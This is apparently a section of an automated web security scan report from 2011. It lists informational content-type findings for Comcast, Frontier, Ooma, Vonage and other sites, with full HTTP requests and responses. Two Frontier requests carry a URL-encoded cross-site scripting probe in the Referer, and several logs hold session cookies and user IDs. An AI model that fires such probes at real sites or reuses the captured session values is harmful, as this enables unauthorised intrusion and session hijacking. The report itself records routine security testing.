s_sess=%20_dr%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253Dutf-8%2526q%253Dtelephone%252Bservice%3B%20cf%3D0%3B%20c%3DundefinedDirect%2520LoadDirect%2520Load%3B%20s_cc%3Dtrue%3B%20ev41%3Dinternet%2520phone%3B%20stc18%3Dinternet%2520phone%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; bn_u=6923713561343025788; fsr.a=1315329867492; mbox=session#1315327839174-766376#1315331728|PC#1315327839174-766376.19#1316539468|check#true#1315329928

Response

HTTP/1.1 200 OK
Content-Type: image/gif
Last-Modified: Mon, 28 Jun 2010 22:27:05 GMT
Accept-Ranges: bytes
ETag: "2aab9791117cb1:0"
Server: Microsoft-IIS/7.5
Date: Tue, 06 Sep 2011 12:24:27 GMT
Connection: close
Content-Length: 354

......JFIF.....d.d......Ducky.......T......Adobe.d......................................................................................................................................................
...[SNIP]...

25.48. http://www.comcast.com/MediaLibrary/1/1/Common/Images/borders/230_bottom.gif  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.comcast.com
Path:   /MediaLibrary/1/1/Common/Images/borders/230_bottom.gif

Issue detail

The response contains the following Content-type statement:The response states that it contains a GIF image. However, it actually appears to contain a JPEG image.

Request

GET /MediaLibrary/1/1/Common/Images/borders/230_bottom.gif HTTP/1.1
Host: www.comcast.com
Proxy-Connection: keep-alive
Referer: http://www.comcast.com/Corporate/shop/retail/StoreLocator.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerpool_comcastcom_VIP1=3882506052.20480.0000; SC=RC.USID=affb48c8-12df-45e7-aa6c-841fefd17445; UCID=86e6f9cd-e501-4b6d-9a3f-1acdcee0e2c9; BIGipServerpool_comcastcom-VIP2=137228613.20480.0000; UserID=86e6f9cd-e501-4b6d-9a3f-1acdcee0e2c9; bn_u=6923713561343025788; fsr.s={"v":1,"pv":1,"lc":{"d0":{"v":1,"s":true,"e":1}},"sd":0,"cp":{"CustomerID":"86e6f9cd-e501-4b6d-9a3f-1acdcee0e2c9"}}; s_pers=%20s_cpm%3D%255B%255B'Keyword'%252C'1315327839972'%255D%252C%255B'Direct%252520Load'%252C'1315329734689'%255D%255D%7C1473182534689%3B%20s_v5%3D%255B%255B'xss'%252C'1315329734677'%255D%252C%255B'internet%252520phone'%252C'1315329864239'%255D%255D%7C1473182664238%3B%20s_dfa%3Dcomcastdotcomprod%7C1315331664694%3B%20gpv_07%3Dcustomers%2520-%2520move%2520-%2520home%7C1315331664856%3B; s_sess=%20_dr%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253Dutf-8%2526q%253Dtelephone%252Bservice%3B%20cf%3D0%3B%20c%3DundefinedDirect%2520LoadDirect%2520Load%3B%20ev41%3Dinternet%2520phone%3B%20stc18%3Dinternet%2520phone%3B%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; fsr.a=1315329865299; mbox=session#1315327839174-766376#1315331726|PC#1315327839174-766376.19#1316539466|check#true#1315329926

Response

HTTP/1.1 200 OK
Content-Type: image/gif
Last-Modified: Mon, 28 Jun 2010 22:27:09 GMT
Accept-Ranges: bytes
ETag: "cadbd3b1117cb1:0"
Server: Microsoft-IIS/7.5
Date: Tue, 06 Sep 2011 12:24:25 GMT
Connection: close
Content-Length: 657

......JFIF.....d.d......Ducky.......T......Adobe.d.....................................................................................................................................................
...[SNIP]...

25.49. http://www.comcast.com/MediaLibrary/1/1/Common/Images/borders/230_top.gif  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.comcast.com
Path:   /MediaLibrary/1/1/Common/Images/borders/230_top.gif

Issue detail

The response contains the following Content-type statement:The response states that it contains a GIF image. However, it actually appears to contain a JPEG image.

Request

GET /MediaLibrary/1/1/Common/Images/borders/230_top.gif HTTP/1.1
Host: www.comcast.com
Proxy-Connection: keep-alive
Referer: http://www.comcast.com/Corporate/shop/retail/StoreLocator.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerpool_comcastcom_VIP1=3882506052.20480.0000; SC=RC.USID=affb48c8-12df-45e7-aa6c-841fefd17445; UCID=86e6f9cd-e501-4b6d-9a3f-1acdcee0e2c9; BIGipServerpool_comcastcom-VIP2=137228613.20480.0000; UserID=86e6f9cd-e501-4b6d-9a3f-1acdcee0e2c9; bn_u=6923713561343025788; fsr.s={"v":1,"pv":1,"lc":{"d0":{"v":1,"s":true,"e":1}},"sd":0,"cp":{"CustomerID":"86e6f9cd-e501-4b6d-9a3f-1acdcee0e2c9"}}; s_pers=%20s_cpm%3D%255B%255B'Keyword'%252C'1315327839972'%255D%252C%255B'Direct%252520Load'%252C'1315329734689'%255D%255D%7C1473182534689%3B%20s_v5%3D%255B%255B'xss'%252C'1315329734677'%255D%252C%255B'internet%252520phone'%252C'1315329864239'%255D%255D%7C1473182664238%3B%20s_dfa%3Dcomcastdotcomprod%7C1315331664694%3B%20gpv_07%3Dcustomers%2520-%2520move%2520-%2520home%7C1315331664856%3B; s_sess=%20_dr%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253Dutf-8%2526q%253Dtelephone%252Bservice%3B%20cf%3D0%3B%20c%3DundefinedDirect%2520LoadDirect%2520Load%3B%20ev41%3Dinternet%2520phone%3B%20stc18%3Dinternet%2520phone%3B%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; fsr.a=1315329865299; mbox=session#1315327839174-766376#1315331726|PC#1315327839174-766376.19#1316539466|check#true#1315329926

Response

HTTP/1.1 200 OK
Content-Type: image/gif
Last-Modified: Mon, 28 Jun 2010 22:27:10 GMT
Accept-Ranges: bytes
ETag: "f4e6ac1117cb1:0"
Server: Microsoft-IIS/7.5
Date: Tue, 06 Sep 2011 12:24:25 GMT
Connection: close
Content-Length: 681

......JFIF.....d.d......Ducky.......T......Adobe.d.....................................................................................................................................................
...[SNIP]...

25.50. https://www.comcast.com/Localization/QueryCompletion.cajax  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://www.comcast.com
Path:   /Localization/QueryCompletion.cajax

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

POST /Localization/QueryCompletion.cajax HTTP/1.1
Host: www.comcast.com
Connection: keep-alive
Referer: https://www.comcast.com/Localization/Localize.cspx?Referer=%2fshop%2fbuyflow%2fdefault.ashx%3farea%3d6%26SourcePage%3dVOIP
Content-Length: 39
Origin: https://www.comcast.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/xml
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerpool_comcastcom_VIP1=3882506052.20480.0000; SC=RC.USID=affb48c8-12df-45e7-aa6c-841fefd17445; UCID=86e6f9cd-e501-4b6d-9a3f-1acdcee0e2c9; BIGipServerpool_comcastcom-VIP2=137228613.20480.0000; mbox=session#1315327839174-766376#1315330223|check#true#1315328423; s_pers=%20s_cpm%3D%255B%255B'Keyword'%252C'1315327839972'%255D%255D%7C1473180639972%3B%20s_dfa%3Dcomcastdotcomprod%7C1315330160518%3B%20gpv_07%3Dlocalization%2520-%2520shop%7C1315330162478%3B; s_sess=%20c%3Dtelephone%252BserviceKNC-IQ_ID_34270410-VQ2-g-VQ3--VQ6-14654906136www.google.com%3B%20_dr%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253Dutf-8%2526q%253Dtelephone%252Bservice%3B%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20cf%3D0%3B%20s_sq%3D%3B; UserID=86e6f9cd-e501-4b6d-9a3f-1acdcee0e2c9; fsr.s={"v":1,"pv":1,"lc":{"d0":{"v":1,"s":true,"e":1}},"sd":0}

{"Method":"GetKeywords","Arg":"\"xs\""}

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 38
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Date: Tue, 06 Sep 2011 12:22:11 GMT
Connection: close

"{\"_keyword\":\"xs\",\"_result\":[]}"

25.51. http://www.frontier.com/AgentOrdering/CustomAppTabInfo/tabs.css  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.frontier.com
Path:   /AgentOrdering/CustomAppTabInfo/tabs.css

Issue detail

The response contains the following Content-type statement:The response states that it contains CSS. However, it actually appears to contain HTML.

Request

GET /AgentOrdering/CustomAppTabInfo/tabs.css HTTP/1.1
Host: www.frontier.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.frontier.com/yahoo/fpsearchlg.aspa4f61%2527%253balert%25281%2529%252f%252f5fb1c88860b?type=biz
Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da8825CMWWI; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Content-Length: 542
Content-Type: text/css
Last-Modified: Thu, 04 Mar 2010 19:40:42 GMT
Accept-Ranges: bytes
ETag: "0d92993d2bbca1:a39"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 12:31:23 GMT

<STYLE TYPE="text/css">
   h1,p{
       margin:0px !important;
   }
   .tableft{
       background-image:url(../Images/tableft.gif);
   }
   .tabright{
       background-image:url(../Images/tabright.gif);
   }
   #tabm
...[SNIP]...

25.52. http://www.frontier.com/Controls/SharedWebMethods.aspx/GetCurrentLocale  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.frontier.com
Path:   /Controls/SharedWebMethods.aspx/GetCurrentLocale

Issue detail

The response contains the following Content-type statement:The response states that it contains JSON. However, it actually appears to contain plain text.

Request

POST /Controls/SharedWebMethods.aspx/GetCurrentLocale HTTP/1.1
Host: www.frontier.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: application/json, text/javascript, */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Content-Type: application/json; charset=utf-8
X-Requested-With: XMLHttpRequest
Referer: http://www.frontier.com/yahoo/fpsearchlg.aspa4f61%2527%253balert%25281%2529%252f%252f5fb1c88860b?type=biz
Content-Length: 12
Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da8825CMWWI; s_cc=true; s_sq=%5B%5BB%5D%5D; ASP.NET_SessionId=wb3blj55msl0la32go52ws55; CP=null*
Pragma: no-cache
Cache-Control: no-cache

{'href': ''}

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:31:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private, max-age=0
Content-Type: application/json; charset=utf-8
Content-Length: 2

""

25.53. https://www.frontier.com/AgentOrdering/CustomAppTabInfo/tabs.css  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://www.frontier.com
Path:   /AgentOrdering/CustomAppTabInfo/tabs.css

Issue detail

The response contains the following Content-type statement:The response states that it contains CSS. However, it actually appears to contain HTML.

Request

GET /AgentOrdering/CustomAppTabInfo/tabs.css HTTP/1.1
Host: www.frontier.com
Connection: keep-alive
Referer: https://www.frontier.com/AgentOrdering/Login/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da850aCMYIL; s_cc=true; ASP.NET_SessionId=prjxq13zplqa01qcdfmwqt45; s_sq=cznfrontier%3D%2526pid%253DFrontier.com%252520%25253A%2525202011%252520Commercial%252520Summer%252520Offer%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Ffrontier.com%25252FAgentOrdering%25252FLogin%25252F%2526ot%253DA

Response

HTTP/1.1 200 OK
Content-Length: 542
Content-Type: text/css
Last-Modified: Thu, 04 Mar 2010 19:40:42 GMT
Accept-Ranges: bytes
ETag: "0d92993d2bbca1:51c"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 12:27:19 GMT

<STYLE TYPE="text/css">
   h1,p{
       margin:0px !important;
   }
   .tableft{
       background-image:url(../Images/tableft.gif);
   }
   .tabright{
       background-image:url(../Images/tabright.gif);
   }
   #tabm
...[SNIP]...

25.54. https://www.frontier.com/Controls/SharedWebMethods.aspx/GetCurrentLocale  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://www.frontier.com
Path:   /Controls/SharedWebMethods.aspx/GetCurrentLocale

Issue detail

The response contains the following Content-type statement:The response states that it contains JSON. However, it actually appears to contain plain text.

Request

POST /Controls/SharedWebMethods.aspx/GetCurrentLocale HTTP/1.1
Host: www.frontier.com
Connection: keep-alive
Referer: https://www.frontier.com/AgentOrdering/Login/
Content-Length: 12
Origin: https://www.frontier.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/json; charset=UTF-8
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da850aCMYIL; ASP.NET_SessionId=prjxq13zplqa01qcdfmwqt45; CP=null*; s_cc=true; s_sq=%5B%5BB%5D%5D

{'href': ''}

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:27:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private, max-age=0
Content-Type: application/json; charset=utf-8
Content-Length: 2

""

25.55. http://www.ooma.com/poormanscron/run-cron-check  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.ooma.com
Path:   /poormanscron/run-cron-check

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /poormanscron/run-cron-check HTTP/1.1
Host: www.ooma.com
Proxy-Connection: keep-alive
Referer: http://www.ooma.com/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS7755cd8bc8424ab1d27f14d04d5a5a56=npu0136i2olrdchgh3cn570or2; has_js=1; __utmx=238888606.; __utmxx=238888606.; __utmx_k_247871838=1; __utma=257238996.1845384337.1315327926.1315327926.1315327926.1; __utmb=257238996.1.10.1315327926; __utmc=257238996; __utmz=257238996.1315327926.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=telephone%20service; _chartbeat2=qemhbgfmeo01qhct.1315327925630

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:52:05 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.11
Expires: Tue, 06 Sep 2011 12:24:53 +0000
Last-Modified: Tue, 06 Sep 2011 11:52:05 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Length: 21
Connection: close
Content-Type: text/javascript; charset=utf-8

{ "cron_run": false }

25.56. http://www.ooma.com/sites/all/themes/ooma/img/home_savings_bar.png  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.ooma.com
Path:   /sites/all/themes/ooma/img/home_savings_bar.png

Issue detail

The response contains the following Content-type statement:The response states that it contains a PNG image. However, it actually appears to contain a JPEG image.

Request

GET /sites/all/themes/ooma/img/home_savings_bar.png HTTP/1.1
Host: www.ooma.com
Proxy-Connection: keep-alive
Referer: http://www.ooma.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS7755cd8bc8424ab1d27f14d04d5a5a56=npu0136i2olrdchgh3cn570or2; has_js=1; __utmx=238888606.; __utmxx=238888606.; __utmx_k_247871838=1

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:52:05 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Fri, 20 May 2011 18:17:58 GMT
ETag: "174016-22f1-4a3b9242c4180"
Accept-Ranges: bytes
Content-Length: 8945
Cache-Control: max-age=1209600
Expires: Tue, 20 Sep 2011 11:52:05 GMT
Connection: close
Content-Type: image/png

......JFIF.....d.d......Ducky.......P......Adobe.d.....................................................        

       ......................    ..    .    ........................................................<....
...[SNIP]...

25.57. http://www.vonage.com/googlesearch/get_results.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.vonage.com
Path:   /googlesearch/get_results.php

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain XML.

Request

POST /googlesearch/get_results.php?mode=cluster&coutput=xml&client=external_test&q=xss&lang_cntry=en_us&refer=/ HTTP/1.1
Host: www.vonage.com
Proxy-Connection: keep-alive
Referer: http://www.vonage.com/search.php?q=xss&submit.x=18&submit.y=13&submit=Search&gsaCtx=i&lang_cntry=en_us
Content-Length: 0
Origin: http://www.vonage.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cpmcvp=%5B%5B%27Google-Organic-telephone%2520service%27%2C%271315327933547%27%5D%5D; s_vi=[CS]v1|273304B6850795C1-60000100600024FD[CE]; vpc=1; oa_event=1; s_cm=telephone%20serviceGooglewww.google.com; op471customerhomepagegum=a04v0e90o72796q0724o91744; op471customerhomepageliid=a04v0e90o72796q0724o91744; MP_GEOINFO="{country:'us',region:'',city:'',zipCode:'',areaCode:'',metroCode:''}"; s_cc=true; s_nr=1315328340141-New; gpv_pageName=index_login; s_sq=%5B%5BB%5D%5D; __utma=224263452.956306206.1315327934.1315327934.1315327934.1; __utmb=224263452.3.10.1315327934; __utmc=224263452; __utmz=224263452.1315327934.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=telephone%20service

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:59:02 GMT
Server: Apache
X-Powered-By: PHP/5.2.8
Content-Length: 65
Content-Type: text/html

<?xml version="1.0"?>
<toplevel>
<t_fetch int="19"/>
</toplevel>

25.58. http://www.websitealive9.com/2140/Visitor/vTracker_v2.asp  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.websitealive9.com
Path:   /2140/Visitor/vTracker_v2.asp

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /2140/Visitor/vTracker_v2.asp?websiteid=344&groupid=2140 HTTP/1.1
Host: www.websitealive9.com
Proxy-Connection: keep-alive
Referer: http://www.ooma.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:52:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
cache-control: no-store, must-revalidate, private
Pragma: no-cache
P3P: CP="NOI DSP COR CURa OUR NOR"
Content-Length: 8029
Content-Type: text/html
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Cache-control: private


var embed_departmentid = '0';


// keep on page
function URLEncode(plaintext)
{
   // The Javascript escape and unescape functions do not correspond
   // with what browsers actually do...
   va
...[SNIP]...

25.59. http://www.whitefence.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.whitefence.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: www.whitefence.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=7mgkb57jloi23h6h58j84sq2b4; _vis_opt_s=1%7C; _vis_opt_test_cookie=1; s_cc=true; s_sq=%5B%5BB%5D%5D; __utma=218834399.1875876376.1315327922.1315327922.1315327922.1; __utmb=218834399.1.10.1315327922; __utmc=218834399; __utmz=218834399.1315327922.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=telephone%20service

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:52:10 GMT
Server: Apache
Vary: *
Cache-Control: max-age=86400
Expires: Wed, 07 Sep 2011 11:52:10 GMT
Last-Modified: Tue, 08 Jul 2008 14:18:00 GMT
ETag: "199a44-47e-48737718"
Accept-Ranges: bytes
Content-Length: 1150
Content-Type: text/plain

............ .h.......(....... ..... ..........................................v.6.. ..._...u...x...a...#..v.<.........................v.    .. ...................................&..v...............v.    ..
...[SNIP]...

26. Content type is not specified  previous
There are 2 instances of this issue:

Issue description

If a web response does not specify a content type, then the browser will usually analyse the response and attempt to determine the MIME type of its content. This can have unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the absence of a content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.


26.1. http://ad.yieldmanager.com/st  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /st

Request

GET /st?_PVID=rUCgA9j8evXpARpjTl.wjQkMMhd7ak5mEjsAAiW7&ad_type=iframe&ad_size=300x250&site=224114&section_code=14486084&cb=1315312187399365&yud=zip%3D%26ycg%3D%26yyob%3D&pub_redirect_unencoded=1&pub_redirect=http://global.ard.yahoo.com/SIG=15sa69po3/M=787833.14486084.14323910.12559432/D=allmyfr/S=360632246:LREC/Y=YAHOO/EXP=1315319387/L=rUCgA9j8evXpARpjTl.wjQkMMhd7ak5mEjsAAiW7/B=ejW9Ptj8el8-/J=1315312187399365/K=nql_VTEk0rLg6_ewKQ00GQ/A=6284639/R=0/* HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://frontier.my.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=dd24a7d4-d3d5-11e0-8d9f-78e7d1fad490&_hmacv=1&_salt=2478993672&_keyid=k1&_hmac=b96a3af4c1f9c52f33944d31e2827ff5a044729b; pc1="b!!!!#!!`4y!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]i]~~"; pv1="b!!!!%!!`5!!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]gD=7pQN~!!qrZ!,Y+@!$[S0!2reF!''w-!!!!$!?5%!'jyc4!i=9S!!J0T!(>n0~~~~~~=3]gE=3gdJM.jTN!#101!,Y+@!$XwL!1n,b!#t3o~!!ZH)'jyc6!w1K*!!J0T!$!$U!$]7n~~~~~=3]ih~~"; ih="b!!!!(!,`ch!!!!#=3]gD!.`.U!!!!#=3H3k!1n,b!!!!%=3]ih!2(Qv!!!!#=3^]V!2reF!!!!#=3]gE"; bh="b!!!#C!!-C,!!!!%=3`c_!!-O3!!!!#=3G@^!!1CB!!!!#=3_%L!!3O?!!!!%=3`c_!!3ba!!!!%=3_*]!!4dM!!!!#=3]fh!!Os7!!!!#=3G@^!!WMT!!!!#=3]fx!!`4x!!!!%=3]i_!!i9U!!!!'=3O-Q!!iOo!!!!%=3^]5!!jBx!!!!#=2srH!!pf4!!!!%=3`c_!!y)?!!!!#=3*$x!#%v(!!!!#=3*$x!#.dO!!!!%=3H5P!#0Db!!!!#=3*$x!#0Kr!!!!(=3MuQ!#2Gj!!!!%=3`c_!#2Rm!!!!#=3*$x!#83a!!!!#=3*$x!#83b!!!!#=35g_!#8TD!!!!#=3*$x!#?LQ!!!!'=3[HX!#Fw`!!!!'=3[HX!#N[5!!!!#=3!ea!#Q*T!!!!%=3H5P!#RY.!!!!%=3H5P!#SCj!!!!%=3H5P!#SCk!!!!%=3H5P!#UD`!!!!$=3**U!#WZE!!!!#=3*$x!#YCf!!!!#=35g_!#YQK!!!!#=3@yl!#Z8E!!!!#=3G@^!#]W%!!!!%=3H5P!#`WU!!!!#=3_(1!#aG>!!!!%=3H5P!#bw^!!!!#=3G@^!#dCX!!!!#=3O-J!#eP^!!!!#=3*$x!#fBj!!!!#=3G@^!#fBk!!!!#=3G@^!#fBl!!!!#=3G@^!#fBm!!!!#=3G@^!#fBn!!!!#=3G@^!#fG+!!!!#=3G@^!#fvy!!!!#=3H3j!#k[]!!!!#=3!ea!#k[_!!!!#=35g_!#qMq!!!!#=3GDG!#tCn!!!!%=3H5P!#tK$!!!!%=3H5P!#uEh!!!!$=3Msq!#uQD!!!!#=3_%L!#uQG!!!!#=3_%L!#ust!!!!%=3H5P!#usu!!!!%=3H5P!#v-#!!!!#=3*$x!#wW9!!!!%=3H5P!#yM#!!!!%=3H5P!$#WA!!!!%=3H5P!$%,!!!!!%=3H5P!$%SB!!!!%=3H5P!$%sF!!!!#=3!ea!$%sH!!!!#=35g_!$%uX!!!!#=35g_!$%vg!!!!#=3!ea!$%vi!!!!#=35g_!$(!P!!!!#=3G@^!$(aZ!!!!#=3M1/!$)gB!!!!#=3*$x!$*9h!!!!#=35g_!$*NG!!!!#=3_%M!$*Q<!!!!%=3H5P!$*a0!!!!%=3H5P!$*iP!!!!#=3_(3!$+2e!!!!#=3!ea!$+2h!!!!#=35g_!$+fh!!!!#=3f*7!$+fl!!!!#=3f+$!$,0h!!!!%=3H5P!$,jv!!!!#=3!ea!$.TJ!!!!#=3!ea!$.TK!!!!#=35g_!$/iQ!!!!%=3H5P!$0Ge!!!!(=3MuS!$1:.!!!!#=3!ea!$1NN!!!!#=3[H:!$1N`!!!!$=3[H0!$1P-!!!!$=3[H0!$1PB!!!!#=3[H:!$1QB!!!!#=3[HX!$2::!!!!#=3[HX!$2j$!!!!%=3H5P!$3Dm!!!!#=3*4J!$3IO!!!!#=3G@^!$3jT!!!!%=3H5P!$3y-!!!!'=2v<]!$4ou!!!!%=3H5P!$5Nu!!!!%=3H5P!$5oO!!!!%=3H5P!$5qE!!!!%=3H5P!$7w'!!!!#=3*4K!$9_!!!!!#=3!ea!$:3]!!!!#=3!ea!$:Py!!!!%=3H5P!$<DI!!!!#=3G@^!$=X=!!!!#=3H3a!$=p7!!!!%=3H5P!$=p8!!!!%=3H5P!$=s@!!!!$=3H5P!$>#M!!!!%=3H5P!$>#N!!!!%=3H5P!$>ox!!!!$=3_*_!$?i5!!!!%=3`c_"; BX=ei08qcd75vc4d&b=3&s=8s&t=246

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:29:48 GMT
Server: YTS/1.18.4
